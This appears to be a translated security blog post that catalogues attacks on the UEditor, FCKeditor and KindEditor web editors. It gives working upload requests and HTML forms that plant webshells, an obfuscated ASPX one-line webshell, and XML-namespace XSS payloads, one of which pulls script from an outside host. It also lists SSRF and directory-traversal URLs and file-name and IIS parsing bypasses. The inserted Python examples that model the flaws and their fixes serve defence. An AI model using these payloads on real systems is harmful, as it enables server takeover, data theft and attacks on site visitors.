Ueditor, FCKeditor, kindeditor editor vulnerability
2022-07-03 05:03:00 【zhibx】
Ueditor editor vulnerabilities
File upload vulnerability
- .NET version file upload
The arbitrary file upload vulnerability exists in versions 1.4.3.3, 1.5.0 and 1.3.6, and only the .NET version is affected. An attacker can use it to upload a webshell and run commands to take control of the server. The cause is that, when a file is fetched through the catchimage action, the CrawlerHandler class does not validate the file type, so an arbitrary file ends up in the upload directory. 1.4.3.3 and 1.5.0 are exploited slightly differently: 1.4.3.3 requires a domain name that resolves correctly, while 1.5.0 accepts both IP addresses and ordinary domain names, so 1.5.0 is easier to trigger; on 1.4.3.3 the attacker has to host the payload under a normal domain name to get past the check.
(1) ueditor 1.5.0 .NET edition
Test 1.5.0 first. Host an image webshell (1.jpg, 1.gif or 1.png all work) on a server the target can reach; below, x.x.x.x is that server's address. Set the source[] parameter to the URL of the image webshell and append "?.aspx" to it to get a shell. POC:
POST /ueditor/net/controller.ashx?action=catchimage
source%5B%5D=http%3A%2F%2Fx.x.x.x/1.gif?.aspx
(2) ueditor 1.4.3.3 .NET edition
1. Build an HTML form locally. Because this is not a multipart file upload, enctype does not need to be multipart/form-data (some published POCs set it anyway). Complete POC:
<form action="http://xxxxxxxxx/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
  <p>shell addr: <input type="text" name="source[]" /></p>
  <input type="submit" value="Submit" />
</form>
2. Prepare an image webshell. The remote shell address must be given with the extension trick, i.e. 1.gif?.aspx. The 1.gif image webshell (a one-line ASPX shell, password: hello) is:
GIF89a<script runat="server" language="JScript">
function popup(str) {
    var q = "u"; var w = "afe";
    var a = q + "ns" + w;      // assembles the string "unsafe" to avoid a literal match
    var b = eval(str, a);      // evaluates the decoded expression in unsafe mode
    return (b);
}
</script>
<% popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJoZWxsbyJd")))); %>
(The base64 string decodes to Request.Item["hello"], so the code sent in the "hello" parameter is evaluated server-side.)
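To make the root cause concrete, here is an added example (written for this article, not UEditor's own code) that models in Python the two decisions behind the "?.aspx" trick: the handler only checks that the fetched response carries an image Content-Type, and it names the saved file after the raw source URL string in the way .NET's Path.GetFileName does, query string included. That the name is derived from the URL string is the mechanism implied by the trick; it is modelled here as an assumption, not quoted from the handler source. `vulnerable_save_name` reproduces that behaviour and `hardened_save_name` shows the fix: parse the URL, allowlist the extension, and let the bytes decide the stored extension. The responses are constructed tuples, nothing is fetched, and the domain-name requirement of 1.4.3.3 is not modelled.

```python
"""Model of the catchimage extension bug: vulnerable path vs hardened path.

Added example, not UEditor's own code. Assumption being modelled: the handler
checks only the response Content-Type and names the saved file after the URL
string (Path.GetFileName-style, query string included).
"""
import posixpath
from urllib.parse import urlsplit

ALLOWED_IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}

# Magic bytes -> canonical extension; the hardened path trusts these, not the URL.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
    b"\xff\xd8\xff": ".jpg",
    b"BM": ".bmp",
}


def dotnet_get_filename(url):
    """Path.GetFileName semantics: everything after the last '/' or '\\'.
    A query string is just characters to it, so '1.gif?.aspx' stays whole."""
    return url[max(url.rfind("/"), url.rfind("\\")) + 1:]


def dotnet_get_extension(name):
    """Path.GetExtension semantics: from the last '.' to the end."""
    i = name.rfind(".")
    return name[i:] if i >= 0 else ""


def vulnerable_save_name(source_url, content_type, body):
    """The behaviour the page describes: Content-Type must contain 'image',
    nothing else is validated, and the extension comes from the URL string."""
    if "image" not in content_type.lower():
        return None                        # "Url is not an image"
    ext = dotnet_get_extension(dotnet_get_filename(source_url))
    return "upload/image/catch" + ext      # attacker controls ext via '?.aspx'


def hardened_save_name(source_url, content_type, body):
    """Parse the URL (drops query and fragment), allowlist the URL's own
    extension, and take the stored extension from the bytes."""
    path_ext = posixpath.splitext(posixpath.basename(urlsplit(source_url).path))[1].lower()
    if path_ext not in ALLOWED_IMAGE_EXTS or "image" not in content_type.lower():
        return None
    sniffed = next((ext for magic, ext in MAGIC.items() if body.startswith(magic)), None)
    if sniffed is None:
        return None                        # declared image, but the bytes say otherwise
    return "upload/image/catch" + sniffed  # name chosen by the server, ext by content


if __name__ == "__main__":
    # Constructed response: a "GIF" that is really an ASPX webshell, i.e. a
    # GIF89a header followed by server-side script, like the page's 1.gif.
    url = "http://x.x.x.x/1.gif?.aspx"
    body = b'GIF89a<script runat="server" language="JScript">/* ... */</script>'
    print("vulnerable:", vulnerable_save_name(url, "image/gif", body))  # .aspx on disk
    print("hardened:  ", hardened_save_name(url, "image/gif", body))    # .gif on disk
```

The hardened path still stores the GIF/script polyglot, but under a .gif name it is served as an image and never handed to the ASP.NET handler; the query string no longer has any say in the extension.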
(3) ueditor 1.3.6 .NET edition
Upload using %00 truncation of the file name.
(4) PHP version file upload
The upload handler accepts its configuration (CONFIG[...]) from the request, so the allowed extensions, field name and save path can be overridden by the client. POC:
POST http://localhost/ueditor/php/action_upload.php?action=uploadimage&CONFIG[imagePathFormat]=ueditor/php/upload/fuck&CONFIG[imageMaxSize]=9999999&CONFIG[imageAllowFiles][]=.php&CONFIG[imageFieldName]=fuck HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 222
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDMmqvK6b3ncX4xxA
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

------WebKitFormBoundaryDMmqvK6b3ncX4xxA
Content-Disposition: form-data; name="fuck"; filename="fuck.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundaryDMmqvK6b3ncX4xxA--
The shell path is determined by CONFIG[imagePathFormat]=ueditor/php/upload/fuck: http://localhost/ueditor/php/upload/fuck.php
XSS vulnerability
Upload the following as a .xml file through the file upload interface (check config.json to see whether .xml is in the allowed list). When the file is opened directly in a browser it is rendered as XML, and a script element declared in the XHTML namespace executes even though it is not spelled <script>.
Alert popup
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">
alert(1);
</something:script>
</body>
</html>
URL redirect
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">
window.location.href="https://www.t00ls.net/";
</something:script>
</body>
</html>
Load remote JS
<html>
<head></head>
<body>
<something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml">
</something:script>
</body>
</html>
If you cannot find where to upload the XML through the editor UI, the following request to the uploadfile action can be used:
POST /edit/php/controller.php?action=uploadfile HTTP/1.1
Host: www.baidu.com
Cookie: PHPSESSID=5eoic6stihj2j5oeaila86v7vk;
Content-Length: 351
Cache-Control: max-age=0
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.baidu.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKDwVp6zo1JCNDZ55
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryKDwVp6zo1JCNDZ55
Content-Disposition: form-data; name="upfile"; filename="test.xml"
Content-Type: image/jpeg
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert(/Just a vulnerability test/);
</something:script>
</body>
</html>
------WebKitFormBoundaryKDwVp6zo1JCNDZ55--
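Why the payload above slips past a naive filter: the script element is declared in the XHTML namespace under an arbitrary prefix, so a substring check for `<script` never fires, yet a browser rendering the .xml treats it as a real script element. The following is an added example (not code from this article or from UEditor) that contrasts that naive check with a namespace-aware scan using only Python's standard library; the sample documents are constructed from the page's three payloads plus an SVG with an event handler and one harmless file.

```python
"""Namespace-aware detection of script content in uploaded XML/SVG.

Added example, not UEditor code. A browser that renders an .xml file as XML
honours namespaces, so {http://www.w3.org/1999/xhtml}script is a script
element whatever prefix it carries. The scanner therefore matches on
(namespace, local name), not on the literal text '<script'.
"""
import xml.etree.ElementTree as ET

XHTML_NS = "http://www.w3.org/1999/xhtml"
SVG_NS = "http://www.w3.org/2000/svg"
ACTIVE_ELEMENTS = {"script", "iframe", "object", "embed"}


def naive_has_script(xml_bytes):
    """What a quick substring filter sees."""
    return b"<script" in xml_bytes.lower()


def find_active_content(xml_bytes):
    """Return findings: '{ns}element' for executable elements in the XHTML/SVG
    namespaces and '{ns}element@attr' for on* event-handler attributes.
    Unparseable input is reported as a finding so callers reject by default."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        return ["unparseable: %s" % exc]
    findings = []
    for el in root.iter():
        if not isinstance(el.tag, str):
            continue                      # comments / PIs from custom parsers
        ns, local = el.tag[1:].split("}", 1) if el.tag.startswith("{") else ("", el.tag)
        if ns in (XHTML_NS, SVG_NS) and local in ACTIVE_ELEMENTS:
            findings.append(el.tag)
        for attr in el.attrib:
            # Case-folded on purpose: err on the side of rejecting.
            if attr.split("}")[-1].lower().startswith("on"):
                findings.append("%s@%s" % (el.tag, attr))
    return findings


def is_safe_xml_upload(xml_bytes):
    return not find_active_content(xml_bytes)


# Constructed samples: the page's payload shapes plus an SVG and a harmless file.
POPUP = b'''<html><head></head><body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1);</something:script>
</body></html>'''
REMOTE_JS = b'''<html><body>
<x:script src="http://xss.com/xss.js" xmlns:x="http://www.w3.org/1999/xhtml"></x:script>
</body></html>'''
SVG_ONLOAD = b'''<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect/></svg>'''
HARMLESS = b'''<catalog><item id="1">plain data, no namespaces</item></catalog>'''

if __name__ == "__main__":
    for name, doc in [("popup", POPUP), ("remote_js", REMOTE_JS),
                      ("svg_onload", SVG_ONLOAD), ("harmless", HARMLESS)]:
        print(name, "naive:", naive_has_script(doc),
              "namespace-aware:", find_active_content(doc))
```

Rejecting on parse failure matters: a file the server cannot parse may still be parsed leniently by a browser, so "unknown" must not mean "clean". The better fix is not to accept .xml/.svg/.html uploads at all, or to serve them with Content-Disposition: attachment and a nosniff header so they are never rendered inline.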
config.json shows the upload interface (action) names and the suffixes each interface accepts:
/ueditor/asp/config.json
/ueditor/net/config.json
/ueditor/php/config.json
/ueditor/jsp/config.json
config.json also shows the interface paths that list the files already uploaded:
/ueditor/net/controller.ashx?action=listfile
/ueditor/net/controller.ashx?action=listimage
Upload file paths
/ueditor/index.html
/ueditor/asp/controller.asp?action=uploadimage
/ueditor/asp/controller.asp?action=uploadfile
/ueditor/net/controller.ashx?action=uploadimage
/ueditor/net/controller.ashx?action=uploadfile
/ueditor/php/controller.php?action=uploadfile
/ueditor/php/controller.php?action=uploadimage
/ueditor/jsp/controller.jsp?action=uploadfile
/ueditor/jsp/controller.jsp?action=uploadimage
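A quick way to turn a retrieved config.json into a checklist: the added Python example below (written for this article, not part of UEditor) strips the multi-line comments UEditor's config.json is allowed to contain, pairs every `*ActionName` key with its `*FieldName` and `*AllowFiles` entries, and flags extensions that would either run on the server or be rendered as active content by a browser. The embedded config is a constructed sample laid out like the shipped file; it is not taken from any deployment.

```python
"""Audit a UEditor config.json for upload actions and risky extensions.

Added example, not UEditor code. The sample config below is constructed for
this example (modelled on the shipped file's layout, including the leading
/* */ comment that the real file carries).
"""
import json
import re

# Extensions the web server would execute.
SERVER_EXECUTABLE = {".php", ".php3", ".php4", ".php5", ".phtml", ".asp", ".asa", ".cer",
                     ".aspx", ".ashx", ".asmx", ".jsp", ".jspx", ".cgi", ".pl", ".sh"}
# Extensions a browser renders with script execution when opened directly.
BROWSER_ACTIVE = {".html", ".htm", ".xhtml", ".shtml", ".xml", ".svg", ".swf"}
# Files that change how the server interprets other uploads.
SERVER_CONFIG = {".htaccess", ".config", ".user.ini"}

SAMPLE_CONFIG = r"""/* constructed sample config.json; comments are allowed in the real file */
{
    "imageActionName": "uploadimage",
    "imageFieldName": "upfile",
    "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"],
    "catcherActionName": "catchimage",
    "catcherFieldName": "source",
    "catcherAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"],
    "fileActionName": "uploadfile",
    "fileFieldName": "upfile",
    "fileAllowFiles": [".zip", ".rar", ".pdf", ".txt", ".md", ".xml", ".html"],
    "imageManagerActionName": "listimage",
    "fileManagerActionName": "listfile"
}"""


def load_ueditor_config(text):
    """json.loads after removing /* ... */ comments (the only kind UEditor allows)."""
    return json.loads(re.sub(r"/\*.*?\*/", "", text, flags=re.S))


def upload_actions(cfg):
    """Map each action name to its form field and allowed extensions.
    Keys are found by the *ActionName suffix, so custom prefixes are picked up too."""
    actions = {}
    for key, action in cfg.items():
        if not key.endswith("ActionName"):
            continue
        prefix = key[: -len("ActionName")]
        actions[action] = {
            "field": cfg.get(prefix + "FieldName"),
            "allow": [e.lower() for e in cfg.get(prefix + "AllowFiles", [])],
        }
    return actions


def risky_extensions(cfg):
    """Return {action: {ext: reason}} for every allowed extension worth a second look."""
    report = {}
    for action, info in upload_actions(cfg).items():
        for ext in info["allow"]:
            reason = None
            if ext in SERVER_EXECUTABLE:
                reason = "executed server-side"
            elif ext in BROWSER_ACTIVE:
                reason = "rendered as active content in the browser"
            elif ext in SERVER_CONFIG:
                reason = "changes server interpretation of other files"
            if reason:
                report.setdefault(action, {})[ext] = reason
    return report


if __name__ == "__main__":
    cfg = load_ueditor_config(SAMPLE_CONFIG)
    for action, info in upload_actions(cfg).items():
        print("%-12s field=%-8s allow=%s" % (action, info["field"], info["allow"]))
    print(risky_extensions(cfg))
```

The action names map directly onto the controller URLs listed above (controller.php?action=uploadfile and so on), and the field name is what goes into the multipart Content-Disposition; the report tells you which interface to aim a .xml or .html file at without guessing.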
SSRF vulnerability
/ueditor/jsp/getRemoteImage.jsp?upfile=http://127.0.0.1/favicon.ico?.jpg
/ueditor/jsp/controller.jsp?action=catchimage&source[]=https://www.baidu.com/img/baidu_jgylogo3.gif
/ueditor/php/controller.php?action=catchimage&source[]=https://www.baidu.com/img/baidu_jgylogo3.gif
FCKeditor editor vulnerabilities
Check the FCKeditor version
http://127.0.0.1/fckeditor/editor/dialog/fck_about.html
http://127.0.0.1/FCKeditor/_whatsnew.html
Test upload points
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
File listing
FCKeditor/editor/fckeditor.html
FCKeditor/editor/fckeditor.html cannot upload files by itself, but clicking the upload image button and choosing Browse Server opens the file upload page, where the uploaded files can be viewed.
Read the website directory from the XML returned by the connector:
http://127.0.0.1/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
Get the current folder
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
Browse a drive letter
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/
Disclose the website's absolute path
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp
Change the CurrentFolder parameter with ../../ to move into different directories
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
JSP edition:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
Bypassing restrictions
- Upload restrictions
There are many ways to bypass upload restrictions; the main ones are changing the extension in an intercepted request, %00 truncation, and prepending a valid file header.
- File name restrictions
Second-upload bypass: FCK rewrites "." in the base name to "_", but only on the first upload.
After FCK receives a file such as shell.asp;.jpg, it renames it to shell_asp;.jpg. Upload a file with the same name again and the new copy is named shell.asp;(1).jpg, which IIS 6 executes as ASP because the ";" ends the file name.
Submit shell.php followed by a space
A trailing space only works on Windows (NTFS drops it when the file is created); Linux keeps it. Submitting shell.php followed by a space can therefore bypass the file name check.
IIS 6.0: bypass folder restrictions
Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
Parsing-based bypass
On the FCKeditor file upload page, create a folder named like 1.asp, then upload an image webshell into it. IIS 6 executes everything under a *.asp folder as ASP, so the shell is reached at http://127.0.0.1/images/upload/201806/image/1.asp/1.jpg
FCKeditor v2.4.3
In FCKeditor v2.4.3 the File category denies these extensions by default:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
But the file is saved with $sFilePath = $sServerDir . $sFileName directly, without using the validated $sExtension for the suffix, so on Windows appending a "." to the uploaded file name bypasses the check (NTFS strips the trailing dot). The Windows 2003 / IIS 6 parsing flaw also works here: create an xxx.asp folder, or upload xx.asp;.jpg.
FCKeditor 2.0 <= 2.2
FCKeditor 2.0 to 2.2 allows files with the asa, cer, php2, php4, inc, pwml and pht suffixes. On Windows the trailing "." trick also works, and under Apache the Apache file name parsing flaw can be used, for example by uploading a cer file.
.htaccess method
Where .htaccess is not blocked, upload a .htaccess file whose directives make files with the .jpg suffix be parsed as PHP, then upload the image webshell.
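The bypasses in this section (shell.asp;.jpg after the "." to "_" rename, the (1) collision rename, the 1.asp/ folder, the trailing space and the .htaccess upload) all come from the same mismatch: the connector sanitises the name string while IIS 6 and NTFS decide what actually happens from rules the sanitiser never considered. The added Python example below (mine, not FCKeditor's code) models the sanitiser behaviour the page describes, the IIS 6 resolution rules, NTFS trailing-character stripping, and a store function that sidesteps all of it by never using the client name. The collision branch reusing the unsanitised name is taken from the page's description, not from FCKeditor source, and is an assumption in the model.

```python
"""FCKeditor-style name sanitising vs IIS 6 handler selection.

Added example, not FCKeditor code. fck_sanitize/fck_store follow the page's
description of the connector (dots in the base name become '_', and a second
upload of the same name gets '(1)' inserted before the extension without being
re-sanitised). iis6_handler_for applies the two IIS 6 rules the page relies
on: a ';' ends the file name, and a directory named *.asp makes everything
under it run as ASP.
"""
import re
import secrets

ASP_EXTS = {"asp", "asa", "cer", "cdx"}
IMAGE_ALLOWLIST = {"jpg", "jpeg", "png", "gif"}


def fck_sanitize(name, force_single_extension=True):
    """Forbidden characters become '_'; with ForceSingleExtension every '.'
    except the last becomes '_' (so shell.asp;.jpg -> shell_asp;.jpg).
    Note that ';' is not on the forbidden list."""
    name = re.sub(r'[\\/|:?*"<>\x00-\x1f]', "_", name)
    if force_single_extension:
        name = re.sub(r"\.(?=.*\.)", "_", name)   # all dots but the last
    return name


def fck_store(existing, name):
    """Model of the page's observation: the first upload is sanitised, but the
    collision rename builds '(n)' from the original, unsanitised name."""
    candidate = fck_sanitize(name)
    if candidate not in existing:
        existing.add(candidate)
        return candidate
    base, dot, ext = name.rpartition(".")
    n = 1
    while "%s(%d)%s%s" % (base, n, dot, ext) in existing:
        n += 1
    candidate = "%s(%d)%s%s" % (base, n, dot, ext)
    existing.add(candidate)
    return candidate


def windows_stored_name(name):
    """NTFS drops trailing spaces and dots, so 'shell.php ' is stored as 'shell.php'."""
    return name.rstrip(" .")


def iis6_handler_for(path):
    """'asp' if IIS 6 would hand the request to asp.dll, else 'static'."""
    segments = [s for s in path.split("/") if s]
    if not segments:
        return "static"
    for folder in segments[:-1]:
        if "." in folder and folder.lower().rsplit(".", 1)[-1] in ASP_EXTS:
            return "asp"                           # /x/1.asp/anything -> ASP
    leaf = segments[-1].split(";", 1)[0]           # ';' terminates the name
    ext = leaf.rsplit(".", 1)[-1].lower() if "." in leaf else ""
    return "asp" if ext in ASP_EXTS else "static"


def safe_store(client_name, allowlist=IMAGE_ALLOWLIST):
    """Hardened alternative: allowlist the final extension, then discard the
    client name entirely. Returns None for anything outside the allowlist
    ('.htaccess', 'shell.asp', 'shell.php ' all fail here)."""
    ext = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    if ext not in allowlist:
        return None
    return "%s.%s" % (secrets.token_hex(8), ext)


if __name__ == "__main__":
    seen = set()
    first = fck_store(seen, "shell.asp;.jpg")
    second = fck_store(seen, "shell.asp;.jpg")
    for stored in (first, second):
        print(stored, "->", iis6_handler_for("/upload/" + stored))
    print("/images/upload/1.asp/1.jpg ->", iis6_handler_for("/images/upload/1.asp/1.jpg"))
    print("safe_store:", safe_store("shell.asp;.jpg"), safe_store(".htaccess"))
```

Generating the stored name server-side is what removes the whole class: ";" and "." tricks only matter when the client string reaches the filesystem. Pair it with a magic-byte check on the content and keep the upload directory free of script handlers.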
KindEditor editor vulnerabilities
Upload addresses
kindeditor/asp/upload_json.asp?dir=file
kindeditor/asp.net/upload_json.ashx?dir=file
kindeditor/jsp/upload_json.jsp?dir=file
kindeditor/php/upload_json.php?dir=file
View version information
http://127.0.0.1/kindeditor/kindeditor.js
Each server-side language has its own upload address, so before uploading, verify that the corresponding upload_json.* exists:
/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php
If it exists, files can be uploaded through it.
Upload POC
<html>
<head>
<title>Uploader By ICE</title>
<script src="http://[Target]/kindeditor/kindeditor-min.js"></script>
<script>
KindEditor.ready(function(K) {
    var uploadbutton = K.uploadbutton({
        button : K('#uploadButton')[0],
        fieldName : 'imgFile',
        // point this at whichever upload_json.* exists on the target (asp, asp.net, jsp or php)
        url : 'http://[Target]/kindeditor/php/upload_json.php?dir=file',
        afterUpload : function(data) {
            if (data.error === 0) {
                var url = K.formatUrl(data.url, 'absolute');
                K('#url').val(url);   // show where the file landed
            }
        }
    });
    uploadbutton.fileBox.change(function(e) {
        uploadbutton.submit();
    });
});
</script>
</head>
<body>
<div class="upload">
<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
<input type="button" id="uploadButton" value="Upload" />
</div>
</body>
</html>
Disclaimer:
For authorized security testing only; attacking sites without authorization is prohibited. This article is for study and research only. Using its content to operate illegally against other Internet applications is strictly forbidden; anyone who does so bears the consequences, and none of the resulting risk is connected to the author. By continuing to read, you accept these terms.